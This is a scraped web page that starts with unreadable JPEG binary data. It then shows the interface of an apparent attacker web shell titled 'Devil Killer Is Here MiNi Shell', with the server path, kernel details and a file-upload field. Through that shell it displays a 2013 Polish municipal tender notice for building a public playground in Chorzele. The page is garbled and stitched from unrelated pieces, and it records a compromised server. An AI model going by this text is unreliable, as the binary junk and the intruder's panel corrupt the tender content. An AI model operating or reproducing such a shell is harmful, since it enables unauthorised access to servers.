JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130705/263376-N-2013.html

<p class="kh_header"><b>Chorzele: Budowa ogólnodostępnego placu zabaw przy ul. Kościelnej w Chorzelach, na działkach nr 1031|3, 1031|4</b><br>
<b>Numer ogłoszenia: 263376 - 2013; data zamieszczenia: 05.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chorzele , ul. Stanisława Komosińskiego 1, 06-330 Chorzele, woj. mazowieckie, tel. 29 7515161, faks 29 7515686.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chorzele.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa ogólnodostępnego placu zabaw przy ul. Kościelnej w Chorzelach, na działkach nr 1031|3, 1031|4.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest Budowa ogólnodostępnego placu zabaw przy ul. Kościelnej w Chorzelach, na działkach nr 1031|3, 1031|4.
1. 1. Branża architektoniczna. 
Przedmiotem zamówienia jest wykonanie placu zabaw na działkach nr 1031|3 oraz 1031|4 w miejscowości Chorzele przy ul. Kościelnej, na którym projektuje się park rekreacyjny, fontannę w formie (dry plaza) , ścieżkę zdrowia, wrotowisko, ścieżkę edukacyjną dla dzieci, aleje spacerowe, plac zabaw dla dzieci oraz siłownię zewnętrzną dla dorosłych, mini scenę plenerową w formie podestu o wys. 0,6 m powierzchni 3m2 oraz (kącik zakochanych)- 2 altany (żywe) z gałązek wierzbowych oraz 1 altanę drewnianą, (galerię zdjęć) na taflach szklanych wykonanych metodą grawerowania laserem z efektem 3D (4 tablice ścinki granitowe), budowę oświetlenia parkowego z oprawami LED.
Przedmiot zamówienia obejmuje:
1)roboty ziemne - polegają na wykonaniu koryt pod nawierzchnie alejek spacerowych, wrotowiska oraz pod fundamenty płotów z gabionów oraz tablic ze zdjęciami 3D. Koryta dla poszczególnych konstrukcji projektowanych nawierzchni wyliczono, jako iloczyn wyliczonych powierzchni i projektowanej głębokości warstw,
2)roboty fundamentowe - obejmują 3 x fundamenty o wym. (gł. x dł. x szer.) 60x270x25, trzy płotki z gabionów oraz fundamenty pod 4 tablice ze zdjęciami grawerowanymi w taflach szklanych laserem- efekt 3D wym. fundamentów (gł. x dł. x szer.) 80 x 90 x 35cm.,
3)budowę ogrodzeń - budowa 3 płotów z gabionów z siatki stalowej ocynkowanej wypełnione kamieniami granitowymi łamanymi (granulacji >80mm), grysem szklanym oraz kamieniami fluorescencyjnymi- 3x 2 panele po 2,0 m długości 2,5m, budowa ogrodzenia o wys. do 1,2m, długości 80 mb, ze stali ocynkowanej malowane proszkowo na kolor RAL 6029 oddzielającego plac zabaw od parku z dwoma furtkami samozamykającymi,
4)roboty nawierzchniowe - budowa alejki parkowej wraz z placykami do gry w szachy z kostki granitowej 6x6x6-4 cm w kolorze szarym, wrotowiska z dwoma pętlami całość kostki betonowej bez fazy w kolorze czerwonym, podkreślonej pasem z 2 rzędów kostki granitowej w kolorze szarym oraz obrzeżem z kostki granitowej 10x10cm, nawierzchni bezpiecznych z płyt elastycznych z granulatu sbr i epdm, gr. 4 cm, kolory: pantone152c, RAL 2011, PANTONE 540c, RAL 5003 pod urządzenia zabawowe,
5)roboty w zakresie kształtowania placów zabaw, ścieżki zdrowia oraz siłowni zewnętrznej - zakup, dostarczenie oraz montaż następujących urządzeń:
-karuzela tarczowa, fi 240 cm- 1 szt.;
-huśtawka wagowa z zabezpieczeniem oponami o wym. (dł.x szer.x wys.): 3015x500x915mm - 1 szt.
-bujak sprężynowy |Konik| , wym. (dł.x szer.x wys.): 890x360x900 mm - 1 szt.
-bujak sprężynowy |Motorek|- 1 szt.;
-piaskownica okrągła, fi 290 cm- 1 szt.;
-huśtawka wahadłowa podwójna z jednym krzesełkiem kubełkowym, wym. wym. (dł. x szer. x wys.): 3610x1345x2480 mm, - 1 szt.;
-zestaw zabawowy duży: 2x daszek spadzisty, 1x panel z grą kółko i krzyżyk, 1 x panel z okienkiem bulaj, 1x ścianka wspinaczkowa, 1x wejściówka |koci grzbiet|, 1x zjeżdżalnia prosta - wys.: 1,36m, 1x wejściówka |kamienne schodki|, 1x zjazd strażacki, 2x mostek |wisząca kładka|, 1x mostek linowy, 1x drabinka wejściowa, 4 x uchwyt wejściowy;
-drabinka pozioma, wym. (dł.x szer.x wys.): 2214x1164x2000mm, słupy nośne fi 114mm ze stali, drabinka z rurek stalowych fi 38, montaż w ziemi - fundamenty - 1 szt.;
-drążki gimnastyczne, wym. (dł. x szer. x wys.): 4056x114x2000mm, stalowe słupy nośne fi 114mm, drążki z rurek stalowych  fi 38mm - 1 szt.;
-betonowy stół do gry w tenisa stołowego, blat o wym. 152x274cm z betonu z kruszywem ozdobnym, szlifowany i lakierowany wkopywany w grunt, siatka do gry w ping ponga wykonana z blachy stalowej o gr. 5 mm, wys. 76 cm - 1 szt.;
-betonowy stolik rekreacyjny z 4 siedziskami bez oparcia, do wkopania w grunt, wykonany z wibrowanego betonu zbrojonego klasy B30, z blatem do gry w szachy - 1 szt.,
-przeplotnia wspinaczkowa, wym.: 1640 x 152 x 1650mm, słupy nośne fi 114mm ze stali, drabinka z rurek stalowych fi 38, liny o fi 16 mm - 1 szt.;
-tablica informacyjna, wym. 370x60x1750mm - 2 szt.;
-siłownia zewnętrzna - ORBITREK- 1 szt., PRASA NOŻNA- 1 szt., KOŁA TAI-CHI- 1 szt.; BIEGACZ POJEDYNCZY- 1 szt., WYCISKACZ PODWÓJNY- 1 szt., ROWEREK- 1 szt.;
-|ŻYWA| ALTANA Z GAŁĄZEK WIERZBOWYCH - 2 szt.;
-KOLEJKA LINOWA Z METALU- wym. szer. 222cm, dł. 2222cm, wys. 431 - 1 szt.;
6)budowę fontanny z pompownią - budowa fontanny w formie (dry plaza); niecka na planie elipsy o powierzchni 23 m2, nawierzchnia z płyt granitowych płomieniowanych szarych, czarnych lub różowych o grubości 5 cm, głębokość niecki 0,5 m, atrakcje - 14 dysz zewnętrznych o wys. do 2,20 m, 7 wewnętrznych o wys. do 3,5 m, wszystkie dysze podświetlane diodami LED lub równoważnymi, pompownia w odległości ok. 9 m od niecki, układ fontanny zamknięty;
7)roboty budowlane w zakresie altan:
-altana sześciokątna z drewna impregnowanego,  fi  podstawy do 4,0 m, wys. do 4,0m, krytej gontem bitumicznym w kol. zbliżonym do cegły - 1 szt.;
-2 altany z gałązek wierzbowych na stelażu z prętów stalowych.
8)usługi związane z sadzeniem roślin oraz utrzymania terenów zielonych,
9)mała architektura - zakup dostarczenie i montaż:
-ławka z wysokim oparciem, listwy z drewna egzotycznego (iroko) olejowane, wym. wys. 1310mm, gł. 1160mm, gł. siedziska 380 mm - 2 szt.;
-kosz fi 35cm, wysokość: 110cm, pojemność: 35l konstrukcja stalowa, cynkowana i malowana proszkowo - 6 szt.;
-ławka bez oparcia - dwustronna, listwy z drewna egzotycznego (iroko) olejowane, wym. wys. 430mm, gł. 1160mm, gł. siedziska 1160 mm - 14 szt.;
-wykonanie galerii zdjęć 3d - stare i współczesne zdjęcia Chorzel grawerowane za pomocą lasera w taflach szklanych o wym. 0,5x0,5x0,012 m, podświetlone listwami LED lub równoważnymi, umieszczone w profilach stalowych w ściankach z ciosów granitowych o wys. 160cm - 4 szt.
1.2. Branża elektryczna.
Roboty elektryczne obejmują:
1)Montaż skrzynki rozdzielczej SR;
2)Wykonanie zasilenia kablowego prądem trójfazowym pompowni przy fontannie;
3)Wykonanie zasilenia oświetlenia 8 tablic granitowych z taflą szkła;
4)Wykonanie oświetlenia chodników najazdowymi oprawami LED - 32 szt. i podświetlanie  drzew i krzewów oprawami LED - 6 szt.,
5)Wykonanie oświetlenia całego terenu placu zabaw stylowymi lampami LED na słupach o wys. 3m - 15 szt.,
Zasilanie skrzynki rozdzielczej SR będzie wykonane ze złącza kablowego, którego lokalizację przewidziano w odległości od skrzynki SR  nie większe niż 1 m w pasie drogowym przy granicy z działką 1031|4. Złącze kablowe wykona dostawca energii elektrycznej.     
1.3. Przyłącze wodociągowe.
Projekt obejmuje wykonanie: 
1)Wykopy wykonywane koparką o pojemności łyżki 0,15 m3;
2) Wcinka w istniejące przyłącze wodociągowe;
3) Montaż zasuwy kołnierzowej dn 50 mm z kołnierzami z otworami dn 50;
4)Montaż studni wodomierzowej;
5)Montaż rur PE 40 od studni do pomieszczenia sterowni;
6)Montaż węzła wodomierzowego;
7)Montaż zaworu odcinającego w sterowni;
8)Połączenie rurami PE 40 pomieszczenia sterowni z niecką fontanny;
9)Próba ciśnieniowa;
10)Zasypanie wykopów.   
Przedmiot zamówienia należy wykonać zgodnie z dokumentacją projektową, specyfikacją techniczną wykonania i odbioru robót budowlanych, kosztorysami ślepymi, sztuką budowlaną, obowiązującymi przepisami, normami oraz zapisami SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9, 45.23.10.00-5, 45.23.30.00-9, 45.26.20.00-1, 45.34.20.00-6, 45.11.20.00-5, 45.21.10.00-9, 45.31.10.00-0, 45.33.20.00-3, 45.33.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający wymaga wniesienia wadium.
Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 18.000,00 zł, (słownie: osiemnaście tysięcy złotych).
2.Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1)W pieniądzu, przelewem na rachunek bankowy: 
Bank Spółdzielczy w Chorzelach Nr 31 8913 0005 0000 1472 2000 0030 z adnotacją: wadium - Budowa ogólnodostępnego placu zabaw przy ul. Kościelnej w Chorzelach, na działkach nr 1031|3, 1031|4. 
2)W poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3)W gwarancjach bankowych, 
4)W gwarancjach ubezpieczeniowych,
5)W poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 ze zmianami),
6)Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone w oryginale i musi obejmować cały okres związania ofertą.
7)Wadium musi być wniesione przed upływem wyznaczonego terminu składania ofert tj. do dnia 23.07.2013r. do godz. 12.00.
8)Sposób przekazania: 
Oryginał dokumentu potwierdzającego wniesienie wadium w formach innych niż w pieniądzu należy złożyć w kasie Urzędu Miasta i Gminy w Chorzelach, pok. Nr 2, ul. Stanisława Komosińskiego 1, 06-330 Chorzele, kopię dokumentu potwierdzającego wniesienie wadium należy dołączyć do oferty.
Jeżeli wadium wniesiono w pieniądzu, Wykonawca powinien załączyć do oferty dowód wniesienia wadium na konto Zamawiającego.
Zamawiający dopuszcza, aby oryginał wadium został złożony w kopercie zawierającej ofertę (w osobnej kopercie nie zszyty z resztą oferty),  kopia wadium powinna zostać zszyta z resztą oferty.
9)Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego.
10)Dokumenty dotyczące wniesienia wadium w formach innych niż w pieniądzu należy złożyć w formie oryginału.
11)W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
12)W przypadku składania oferty przez Wykonawców występujących wspólnie (konsorcjum/spółka cywilna) wymagane wadium wnosi konsorcjum/spółka cywilna lub jeden z jej członków.
W przypadku niezabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form wadium Wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta będzie podlegać odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie oceniony według kryterium: spełnia - nie spełnia. Wymagane są uprawnienia budowlane do kierowania robotami budowlanymi w stosownej specjalności  zgodnie z  przepisami ustawy Prawo budowlane oraz przynależność do właściwej izby samorządu zawodowego - dla osoby pełniącej funkcję kierownika robót. Warunek zostanie spełniony, jeżeli Wykonawca złoży oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają wymagane uprawnienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie oceniony według kryterium: spełnia - nie spełnia. Wymagane jest wykonanie w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia min. 1 roboty budowlanej (wykonanej w ramach jednego zamówienia) polegającej na budowie, rozbudowie, modernizacji placów zabaw, parków, skwerów, obiektów małej architektury o wartości nie mniejszej niż 600.000,00 złotych brutto wykonanej w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie oceniony według kryterium: spełnia - nie spełnia.
Wymagane jest posiadanie narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy w celu realizacji zamówienia. Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie oceniony według kryterium: spełnia - nie spełnia.
Wymagane jest dysponowanie osobami, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnymi za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami. Warunek zostanie spełniony, jeżeli Wykonawca załączy wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie oceniony według kryterium: spełnia - nie spełnia. Warunek zostanie uznany za spełniony, jeżeli Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności i przedłoży opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - na kwotę nie mniejszą niż 700.000,00 złotych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wszystkie urządzenia muszą spełniać wymogi normy PN-EN 1176 oraz pozostałych  norm dotyczących nawierzchni i wyposażenia placów zabaw. Wszystkie zastosowane materiały i wyroby muszą posiadać niezbędne atesty, aprobaty i deklaracje zgodności. 
Wszelkie atesty, certyfikaty, dopuszczenia, aprobaty na wbudowane urządzenia i materiały muszą być dostarczone Zamawiającemu do wglądu na 7 dni przed odbiorem końcowym. Materiały muszą być sporządzone w języku polskim, spięte w teczce ilości dwóch egzemplarzy.
Wykonawca zobowiązany jest przygotować książkę obiektu budowlanego, przeprowadzić kontrolę obiektu i sporządzić dwa protokoły z przeglądu rocznego zgodnie z art. 62 ust. 1 pkt. 1 i 2 ustawy Prawo Budowlane (Dz. U. z 2010r. Nr 243, poz. 1623 z późn. zm.)</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza możliwość wprowadzenia następujących zmian w umowie: 
1)zmiana terminu zakończenia zadania, zmiana zakresu rzeczowego lub technologii robót - w przypadku udzielenia w trakcie realizacji niniejszej umowy zamówień dodatkowych, związanych z realizacją zamówienia podstawowego,
2)zmiana terminu realizacji przedmiotu umowy w przypadku niemożności wykonania robót budowlanych z przyczyn niezależnych od Wykonawcy lub Zamawiającego. Termin zakończenia umowy może zostać zmieniony przez strony z uwzględnieniem czasu trwania przyczyny,
3)zmiana terminu w przypadku wystąpienia warunków pogodowych uniemożliwiających realizację robót,
4)zmiana personelu nadzorującego roboty. 
2.Korekty terminów zostaną przedłożone każdorazowo Zamawiającemu do zaakceptowania w terminie siedmiu dni kalendarzowych po powzięciu wiadomości o konieczności wprowadzenia zmian w umowie w formie aneksu do umowy. Minimalny termin przesunięcia terminu zakończenia będzie równy okresowi przerwy lub innych przeszkód w realizacji umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chorzele.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Chorzelach, ul. Stanisława Komosińskiego 1, p. Łukasz Roman, tel. (29) 7516532, fax. (29) 7515686, od poniedziałku do piątku w godz. 8.30 - 15.30.</p>
